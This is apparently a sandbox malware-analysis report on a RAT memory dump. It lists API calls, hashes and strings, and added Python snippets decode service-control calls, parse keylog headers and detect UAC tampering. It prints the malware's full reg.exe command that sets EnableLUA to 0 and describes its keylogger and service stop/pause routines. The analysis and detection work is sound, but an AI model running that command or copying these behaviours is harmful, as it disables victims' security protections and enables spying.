                                  • __allrem.LIBCMT ref: 0043AD1C
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                  • __allrem.LIBCMT ref: 0043AD51
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                  • String ID:
                                  • API String ID: 1992179935-0
                                  • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                  • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                  • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                  APIs
                                  • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                    • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                  Similarity
                                  • API ID: H_prologSleep
                                  • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                  • API String ID: 3469354165-3054508432
                                  • Opcode ID: 157d80eb8e0f3678fafe4a2641bb4748a50a416a1c9fb699c11c746a5f7bd186
                                  • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                  • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                  APIs
                                    • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                  • SetLastError.KERNEL32(000000C1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                  • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                  • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,00000000), ref: 00411E04
                                    • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00411CEE
                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,00000000), ref: 00411E4B
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000), ref: 00411E52
                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411F65
                                    • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,00000000), ref: 00412122
                                    • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00412129
                                  Similarity
                                  • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                  • String ID:
                                  • API String ID: 3950776272-0
                                  • Opcode ID: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
                                  • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                  • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                  Similarity
                                  • API ID: __cftoe
                                  • String ID:
                                  • API String ID: 4189289331-0
                                  • Opcode ID: dfe269b3e7c89c95b27fedd159a696e88b5656ec827068c0169833f59e794ee9
                                  • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                  • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                  • String ID:
                                  • API String ID: 493672254-0
                                  • Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                  • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                  • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                  Similarity
                                  • API ID: __alldvrm$_strrchr
                                  • String ID: PkGNG
                                  • API String ID: 1036877536-263838557
                                  • Opcode ID: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                  • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                  • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                  APIs
                                  • GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                  • _free.LIBCMT ref: 004482CC
                                  • _free.LIBCMT ref: 004482F4
                                  • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                  • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                  • _abort.LIBCMT ref: 00448313
                                  Similarity
                                  • API ID: ErrorLast$_free$_abort
                                  • String ID:
                                  • API String ID: 3160817290-0
                                  • Opcode ID: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                  • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                  • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ControlManager
                                  • String ID:
                                  • API String ID: 221034970-0
                                  • Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                  • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                  • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ControlManager
                                  • String ID:
                                  • API String ID: 221034970-0
                                  • Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                  • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                  • Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                  • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ControlManager
                                  • String ID:
                                  • API String ID: 221034970-0
                                  • Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                  • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                  • Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                  • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
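The three service-control records above are one routine compiled three times with a different control code: OpenServiceW is called with desired access 0x20, 0x40 and 0x40, and ControlService with dwControl 1, 2 and 3. The Python below is an added example, not part of the Joe Sandbox report and not Remcos code: it parses API lines in the shape the IDA plugin prints them and decodes the two parameters against the documented winsvc.h constants (0x20 = SERVICE_STOP, 0x40 = SERVICE_PAUSE_CONTINUE; 1/2/3 = STOP/PAUSE/CONTINUE), then checks that the requested right is the one the control code needs. The constants table, the regex and the function names are mine; the two embedded records are copied verbatim from the report. Because the plugin prints more stack slots than a function has parameters (OpenSCManagerW takes three, not thirteen), the decoder reads only the positional slot that holds the parameter it wants and treats a `?` slot as unrecoverable.

```python
import re

# winsvc.h constants; documented Windows values, not something the report states.
SERVICE_ACCESS = {
    0x0001: "SERVICE_QUERY_CONFIG",
    0x0002: "SERVICE_CHANGE_CONFIG",
    0x0004: "SERVICE_QUERY_STATUS",
    0x0008: "SERVICE_ENUMERATE_DEPENDENTS",
    0x0010: "SERVICE_START",
    0x0020: "SERVICE_STOP",
    0x0040: "SERVICE_PAUSE_CONTINUE",
    0x0080: "SERVICE_INTERROGATE",
    0x0100: "SERVICE_USER_DEFINED_CONTROL",
}
SERVICE_CONTROL = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE",
                   3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE"}
# Access right ControlService requires for each control code, per its documentation.
CONTROL_REQUIRES = {1: 0x0020, 2: 0x0040, 3: 0x0040, 4: 0x0080}

# One "• Func.DLL(args), ref: addr" line as the Joe Sandbox IDA plugin prints it.
API_LINE_RE = re.compile(r"•\s*(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)")

# Two records copied verbatim from the report above (functions at 0x41AB46 and 0x41AC4A).
STOP_RECORD = """
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
"""
PAUSE_RECORD = """
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
• ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
"""


def parse_api_lines(record):
    """Parse each API line into {func, dll, args, ref}; a '?' argument becomes None."""
    calls = []
    for func, dll, argstr, ref in API_LINE_RE.findall(record):
        args = [int(a.strip(), 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", a.strip()) else None
                for a in argstr.split(",")]
        calls.append({"func": func, "dll": dll, "args": args, "ref": int(ref, 16)})
    return calls


def decode_service_control(record):
    """Decode OpenServiceW's dwDesiredAccess and ControlService's dwControl in one record.

    The plugin prints more stack slots than a function has parameters, so only the
    positional slot that holds the parameter of interest is read.
    """
    out = {"rights": [], "control": None, "control_name": None,
           "access_sufficient": None, "handles_closed": 0}
    mask = None
    for call in parse_api_lines(record):
        args = call["args"]
        if call["func"] == "OpenServiceW" and len(args) > 2 and args[2] is not None:
            mask = args[2]                                   # 3rd parameter: dwDesiredAccess
            out["rights"] = [n for bit, n in SERVICE_ACCESS.items() if mask & bit]
        elif call["func"] == "ControlService" and len(args) > 1 and args[1] is not None:
            out["control"] = args[1]                         # 2nd parameter: dwControl
            out["control_name"] = SERVICE_CONTROL.get(args[1], "unknown")
        elif call["func"] == "CloseServiceHandle":
            out["handles_closed"] += 1
    if mask is not None and out["control"] in CONTROL_REQUIRES:
        out["access_sufficient"] = bool(mask & CONTROL_REQUIRES[out["control"]])
    return out


if __name__ == "__main__":
    for name, rec in (("stop", STOP_RECORD), ("pause", PAUSE_RECORD)):
        print(name, decode_service_control(rec))
```

Run against the third record on the page (access 0x40, control 3) the same decoder reports SERVICE_PAUSE_CONTINUE and SERVICE_CONTROL_CONTINUE, consistent with a stop/pause/continue triplet exposed to the operator. The access-sufficiency check is there because a mismatch (for example SERVICE_STOP requested but a CONTINUE sent) would fail with ERROR_ACCESS_DENIED at run time, which is worth knowing before attributing behaviour to a code path that can never succeed.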
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: PkGNG
                                  • API String ID: 0-263838557
                                  • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                  • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                  • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                  • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                  • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
                                  • CloseHandle.KERNEL32(?), ref: 00404DDB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                  • String ID: PkGNG
                                  • API String ID: 3360349984-263838557
                                  • Opcode ID: 77a6d032992f3495e2e52a01d2ead9a1ebcb79a8041a0f526cc04fc7fe31482d
                                  • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                  • Opcode Fuzzy Hash: 77a6d032992f3495e2e52a01d2ead9a1ebcb79a8041a0f526cc04fc7fe31482d
                                  • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                  APIs
                                  • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                  • wsprintfW.USER32 ref: 0040B22E
                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: EventLocalTimewsprintf
                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                  • API String ID: 1497725170-248792730
                                  • Opcode ID: 3d679cc2849754fb2f4fa39d800a84baf68540eafbaed469cb563a02f79558db
                                  • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                  • Opcode Fuzzy Hash: 3d679cc2849754fb2f4fa39d800a84baf68540eafbaed469cb563a02f79558db
                                  • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
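This record shows the offline keylogger stamping a session header with wsprintfW: the "String ID" field lists the format fragments the function references, joined by `$` as Joe Sandbox does for every referenced string. The Python below is an added example for triage of recovered keylog files; it is not from the report and not Remcos code. It turns a wsprintf-style format into a regex (the conversion function, its grammar and all names are mine), assembles the header pattern from the report's three fragments on the assumption that wsprintfW emits them consecutively in the order listed, and then lists session start times in a log. The sample log is constructed here; whether the on-disk file is UTF-16 is an assumption handled by sniffing, not a fact the report states. The `$` split would break on a referenced string that itself contains `$`.

```python
import re

# The "String ID" field from the record above, verbatim. Joe Sandbox joins the strings a
# function references with '$'; assumed here: wsprintfW emits them consecutively in this order.
REPORT_STRING_ID = "[%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]"

# Enough of the printf grammar for wsprintf-style formats: %d/%i, %s and a literal %%.
SPEC_RE = re.compile(r"%(?:(?P<flags>[-+ #0]*)(?P<width>\d*)(?P<conv>[dis])|(?P<pct>%))")


def printf_format_to_regex(fmt):
    """Translate a format string into a regex whose groups capture each conversion."""
    parts, pos = [], 0
    for m in SPEC_RE.finditer(fmt):
        parts.append(re.escape(fmt[pos:m.start()]))
        if m.group("pct"):
            parts.append("%")
        elif m.group("conv") == "s":
            parts.append("(.*?)")
        else:
            width = m.group("width")          # a width is a minimum, so {w,} rather than {w}
            parts.append(r"(-?\d{%s,})" % width if width else r"(-?\d+)")
        pos = m.end()
    parts.append(re.escape(fmt[pos:]))
    return "".join(parts)


def keylog_header_regex():
    """Regex for the session header, built from the report's fragments joined in order."""
    return re.compile(printf_format_to_regex("".join(REPORT_STRING_ID.split("$"))))


def decode_keylog(data):
    """wsprintfW builds UTF-16 text; whether the file is written as UTF-16 is an assumption,
    so sniff for a BOM or a NUL high byte and fall back to UTF-8."""
    if data.startswith(b"\xff\xfe") or (len(data) > 1 and data[1] == 0):
        return data.decode("utf-16-le", errors="replace").lstrip("\ufeff")
    return data.decode("utf-8", errors="replace")


def find_keylog_sessions(text):
    """Return (line_number, ISO-8601 timestamp) for every session header in a log."""
    rx = keylog_header_regex()
    sessions = []
    for n, line in enumerate(text.splitlines(), 1):
        m = rx.search(line)
        if m:
            y, mo, d, h, mi, s = (int(g) for g in m.groups())
            sessions.append((n, f"{y:04d}-{mo:02d}-{d:02d}T{h:02d}:{mi:02d}:{s:02d}"))
    return sessions


# Constructed sample (not a real Remcos log): two sessions with filler lines between them.
SAMPLE_KEYLOG = (
    "[2024/10/02 14:05:31 Offline Keylogger Started]\n"
    "[Untitled - Notepad]\nhello world\n"
    "[2024/10/02 16:40:07 Offline Keylogger Started]\n"
    "[New Tab - Google Chrome]\nhunter2\n"
)

if __name__ == "__main__":
    print(keylog_header_regex().pattern)
    print(find_keylog_sessions(SAMPLE_KEYLOG))
```

The timestamps come from GetLocalTime, as the record shows, so they are in the victim machine's local zone; correlate them against the analysis clock rather than UTC.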
                                  APIs
                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                  • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                  • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSizeSleep
                                  • String ID: XQG
                                  • API String ID: 1958988193-3606453820
                                  • Opcode ID: 09b71735cca9286fb237afdc81f34cc8b89fa37515d8f2a58262fc809d9c95cd
                                  • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                  • Opcode Fuzzy Hash: 09b71735cca9286fb237afdc81f34cc8b89fa37515d8f2a58262fc809d9c95cd
                                  • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                  APIs
                                  • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                  • GetLastError.KERNEL32 ref: 0041D611
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ClassCreateErrorLastRegisterWindow
                                  • String ID: 0$MsgWindowClass
                                  • API String ID: 2877667751-2410386613
                                  • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                  • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                  • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                  • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                  APIs
                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                  • CloseHandle.KERNEL32(?), ref: 004077E5
                                  • CloseHandle.KERNEL32(?), ref: 004077EA
                                  Strings
                                  • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle$CreateProcess
                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                  • API String ID: 2922976086-4183131282
                                  • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                  • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                  • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                  • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
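The command line in this record disables UAC outright: EnableLUA=0 under HKLM\...\Policies\System turns off Admin Approval Mode after the next reboot, which is why the report's "Contains functionality to bypass UAC" signature fires on it. The Python below is an added detection example, not from the report and not Remcos code. It takes process-creation command lines and flags a reg.exe ADD that sets EnableLUA to zero, tolerating the variants met in telemetry: a path or %windir% prefix on reg.exe, a cmd /k or /c wrapper, quoting, the full HKEY_LOCAL_MACHINE hive name, and hex data. REPORT_CMDLINE is the lpCommandLine copied from the record; the SAMPLE_EVENTS list, its pid|image|cmdline shape and all function names are constructed here. The tokenizer is deliberately crude (quotes stripped, split on whitespace) and would mis-split a key path containing spaces, which this one does not.

```python
# Key the report's command line writes to, in normalized (lower-case, HKLM) form.
UAC_POLICY_KEY = r"hklm\software\microsoft\windows\currentversion\policies\system"

# lpCommandLine exactly as the report lists it for CreateProcessA (lpApplicationName is
# C:\Windows\System32\cmd.exe).
REPORT_CMDLINE = (
    r"/k %windir%\System32\reg.exe ADD "
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System "
    r"/v EnableLUA /t REG_DWORD /d 0 /f"
)

# Constructed process-creation events (not from the report) as "pid|image|cmdline".
SAMPLE_EVENTS = [
    r"4120|C:\Windows\System32\cmd.exe|C:\Windows\System32\cmd.exe " + REPORT_CMDLINE,
    r'5208|C:\Windows\System32\reg.exe|"reg" add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0x0 /f',
    r"5311|C:\Windows\System32\reg.exe|reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f",
    r"5400|C:\Windows\System32\reg.exe|reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA",
]


def _tokens(cmdline):
    """Crude cmd.exe tokenizer: strip quotes, lower-case, split on whitespace."""
    return cmdline.replace('"', "").replace("'", "").lower().split()


def detect_uac_disable(cmdline):
    """Return a finding dict if cmdline sets EnableLUA to 0 via reg.exe ADD, else None."""
    toks = _tokens(cmdline)
    for i, tok in enumerate(toks):
        exe = tok.rsplit("\\", 1)[-1]            # drop any path prefix such as %windir%\system32\
        if exe in ("reg", "reg.exe") and i + 1 < len(toks) and toks[i + 1] == "add":
            rest = toks[i + 2:]
            break
    else:
        return None                               # no "reg add" anywhere on the line
    if not rest:
        return None
    key = rest[0].replace("hkey_local_machine", "hklm").rstrip("\\")
    if key != UAC_POLICY_KEY:
        return None
    opts, j = {}, 1
    while j < len(rest):                          # collect /v, /t, /d and their arguments
        if rest[j] in ("/v", "/t", "/d") and j + 1 < len(rest):
            opts[rest[j]] = rest[j + 1]
            j += 2
        else:
            j += 1
    if opts.get("/v") != "enablelua":
        return None
    try:
        data = int(opts.get("/d", ""), 0)         # base 0 accepts both "0" and "0x0"
    except ValueError:
        return None
    if data != 0:
        return None
    return {"technique": "UAC disabled via EnableLUA=0", "key": key, "data": data,
            "cmdline": cmdline}


def scan_events(events):
    """Run the detector over pid|image|cmdline events and return the findings with pids."""
    hits = []
    for ev in events:
        pid, _image, cmdline = ev.split("|", 2)
        finding = detect_uac_disable(cmdline)
        if finding:
            finding["pid"] = int(pid)
            hits.append(finding)
    return hits


if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(hit["pid"], hit["technique"], hit["cmdline"])
```

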